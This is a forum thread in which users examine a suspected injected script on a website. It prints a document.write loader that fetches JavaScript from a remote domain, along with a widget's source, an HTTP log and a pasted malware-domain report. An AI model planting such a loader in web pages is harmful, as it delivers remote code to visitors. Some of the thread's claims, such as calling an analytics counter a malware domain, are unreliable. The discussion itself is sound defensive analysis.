Is this malicious code?

Ask about general coding issues or problems here.

Moderators: macek, egami, gesf

Post Reply
User avatar
egami
php-forum GURU
php-forum GURU
Posts: 2196
Joined: Wed Oct 06, 2010 11:19 am
Location: Happy Valley, UT

Re: Is this malicious code?

Post by egami » Mon Nov 21, 2011 12:24 pm

The code itself isn't really mallicious, it's what the code is downloading that might be.

User avatar
egami
php-forum GURU
php-forum GURU
Posts: 2196
Joined: Wed Oct 06, 2010 11:19 am
Location: Happy Valley, UT

Re: Is this malicious code?

Post by egami » Mon Nov 21, 2011 12:28 pm

OK, so.. it's quite easy.

This script downloads this script..

Code: Select all

<script type="text/javascript"> if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://4llw4d.freefilesblog.com/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://4llw4d.freefilesblog.com/jquery.js"></scr'+'ipt>'); } </script>
and the file http://4llw4d.freefilesblog.com/jquery.js is empty when downloading it straight up.. so it's probably an .htaccess problem because I'm not connecting directly to the website in someway.

I would be cautious of it, to be frank.

TheProdigyGuy
New php-forum User
New php-forum User
Posts: 215
Joined: Wed Dec 07, 2011 5:25 pm

Re: Is this malicious code?

Post by TheProdigyGuy » Thu Jan 19, 2012 2:15 pm

IMHO it is suspicious and using this way (lets say if it is legal site but hacked and that .js files spoofed)
that guys can infect your site visitors+exploit some 0day vulnerabilities against Flash players+Java Plugins+redirect to malware domains+Phish+DDOS another sites using your Real Visitors UA+IP(because it has advantages!) and Finally create BOTNET from your site visitors.

Without referer:
<span style="display:none"><script id="_wau02f">var _wau = _wau || []; _wau.push(["small", "oyh4xtc1j9zo", "02f"]);(function() { var s=document.createElement("script"); s.async=true; s.src="http://widgets.amung.us/small.js";docum ... );</script>
</span>







============================================================
=====================================================================================

cmd> GET /small.js HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
cmd> Host: widgets.amung.us
cmd>
hdr> HTTP/1.1 200 OK
hdr> Date: Thu, 19 Jan 2012 22:26:34 GMT
hdr> Content-Type: application/x-javascript
hdr> Content-Length: 4212
hdr> Last-Modified: Wed, 18 Jan 2012 06:52:38 GMT
hdr> Connection: close
hdr> Server: Apache/1.1 (Windows 4.00.950)
hdr> Expires: Sat, 18 Feb 2012 22:26:34 GMT
hdr> Cache-Control: max-age=2592000
hdr> Accept-Ranges: bytes
RequestDone Error = 0
StatusCode = 200

=====================================================================================

+===> widgets.amung.us malware domain+For calculation count of users!
==> http://cdn.tynt.com/tc.js well known malware domain!

<img src="data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw=="></img>
It also calculates how much "online users"

Code: Select all

var Tynt=Tynt||[];if(typeof _wau!=="undefined"){var WAU_ren=WAU_ren||[];clearTimeout(window.WAU_f_init);window.WAU_f_init=setTimeout(WAU_pl,300)}function WAU_small(b,d){if(typeof d==="undefined"){var d=-1}var a="";if(document.title){a=encodeURIComponent(document.title.substr(0,80).replace(/(\?=)|(\/)/g,""))}var c=document.getElementsByTagName("script")[0];(function(){var f=encodeURIComponent(document.referrer);var e=document.createElement("script");e.async="async";e.type="text/javascript";e.src="http://whos.amung.us/pingjs/?k="+b+"&t="+a+"&c=s&y="+f+"&a="+d+"&r="+Math.ceil(Math.random()*999999);c.parentNode.insertBefore(e,c)})();if(document.location.protocol=="http:"){Tynt.push("w!"+b);(function(){var e=document.createElement("script");e.async="async";e.type="text/javascript";e.src="http://cdn.tynt.com/tc.js";c.parentNode.insertBefore(e,c)})()}}function WAU_r_s(c,key,async_index){if(typeof async_index==="undefined"){var async_index=-1}var raw_im_data="data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw==";var raw_im_meta="({'0':[0,-15,5,8], '1':[-5,-15,3,8], '2':[-8,-15,5,8], '3':[-13,-15,5,8], '4':[-18,-15,5,8], '5':[-23,-15,5,8], '6':[-28,-15,5,8],'7':[-33,-15,5,8], '8':[-38,-15,5,8], '9':[-43,-15,5,8], ',':[-48,-15,2,8], 'o':[-50,-15,24,8]})";var meta=eval(raw_im_meta);if(WAU_legacy_b()){raw_im_data="http://widgets.amung.us/widtemplates/smalloutline.gif"}c+="o";c=c.split("");var img=document.createElement("img");img.onload=function(){var wid=document.createElement("div");wid.style.position="relative";wid.style.display="inline-block";wid.style.backgroundImage="url("+raw_im_data+")";wid.style.width="80px";wid.style.height="15px";wid.style.padding="0";wid.style.margin="0";wid.style.overflow="hidden";wid.style.cursor="pointer";wid.title="Click to see stats for this site by whos.amung.us ("+key+")";var x_pos=20;if(c.length>6&&c[0]!="1"){x_pos=16}else{if(c.length>6&&c[0]=="1"){x_pos=17}}for(var i=0;i<c.length;i++){var char_meta=meta[c[i]];var character=document.createElement("div");character.style.backgroundImage="url("+raw_im_data+")";character.style.backgroundRepeat="no-repeat";character.style.backgroundAttachment="scroll";character.style.backgroundPosition=char_meta[0]+"px "+char_meta[1]+"px";character.style.position="absolute";character.style.width=char_meta[2]+"px";character.style.height=char_meta[3]+"px";character.style.top="4px";character.style.left=x_pos+"px";character.style.lineHeight=char_meta[3]+"px";character.style.overflow="hidden";character.style.padding="0";character.style.margin="0";wid.appendChild(character);x_pos+=char_meta[2]+1}wid.onclick=function(){window.location="http://whos.amung.us/stats/"+key+"/"};if(async_index>=0){var scr=document.getElementById("_wau"+_wau[async_index][2]);scr.parentNode.insertBefore(wid,scr.nextSibling)}else{WAU_insert(wid,"amung.us/small.js")}};img.src=raw_im_data}function WAU_insert(c,d){var a=document.getElementsByTagName("script");for(var b=0;b<a.length;b++){if(a[b].src.indexOf(d)>0){a[b].parentNode.insertBefore(c,a[b].nextSibling)}}}function WAU_legacy_b(){if(navigator.appVersion.indexOf("MSIE")!=-1&&parseFloat(navigator.appVersion.split("MSIE")[1])<8){return true}return false}function WAU_pl(){document.body?WAU_la():setTimeout(WAU_pl,500)}function WAU_la(){for(var a=0;a<_wau.length;a++){if(typeof WAU_ren[a]==="undefined"||WAU_ren[a]==false){WAU_ren[a]=true;if(typeof window["WAU_"+_wau[a][0]]==="function"){if(_wau[a][0]=="map"){window.WAU_map(_wau[a][1],_wau[a][3],_wau[a][4],_wau[a][5],_wau[a][6],a)}else{if(typeof _wau[a][3]!=="undefined"){window["WAU_"+_wau[a][0]](_wau[a][1],_wau[a][3],a)}else{window["WAU_"+_wau[a][0]](_wau[a][1],a)}}}}}};





The site naruto-spoilers.com is travelling around the World Downloading malware. The Journey starts in the USA, then moves to Europe (Germany/Austria) and it ends in China.

Google Tag:
List of Naruto: Shippuden episodes. Naruto is an anime series based on the manga series of the same.

The Cyber Criminals are using AS21844 network to dish out the
infection process. If one malware sites is taking out, a new one will take its place immediately.

The variants found start from Trojan Downloaders all the way up to Fake AV Infections.

The Journey starts at naruto-spoilers.com IP 74.220.207.145:

Malware found on iP:74.220.207.145
PHP/Pbot.A
PHP/Agent.DZ
PHP/BackDoor.AR

naruto-spoilers.com Hosted on Malicious Network:

AS11798 /Bluehost Inc.
Malware Found on AS11798
Trojan Zbot
FakeAV
Exploits

The traffic goes to widgets.amung.us IP 173.192.225.170 through 174.123.133.231
The sites are being hosted on the AS21844. This network is being flagged as
malicious.

Network Info:

Network Name The Planet Internet Services
Primary ASN 21844
Website hxxp://www.theplanet.com
Then katzu.info IP 174.123.133.233




It is really great thing:
grep -r '4llw4d.freefilesblog.com' * |less

Post Reply

Who is online

Users browsing this forum: No registered users and 10 guests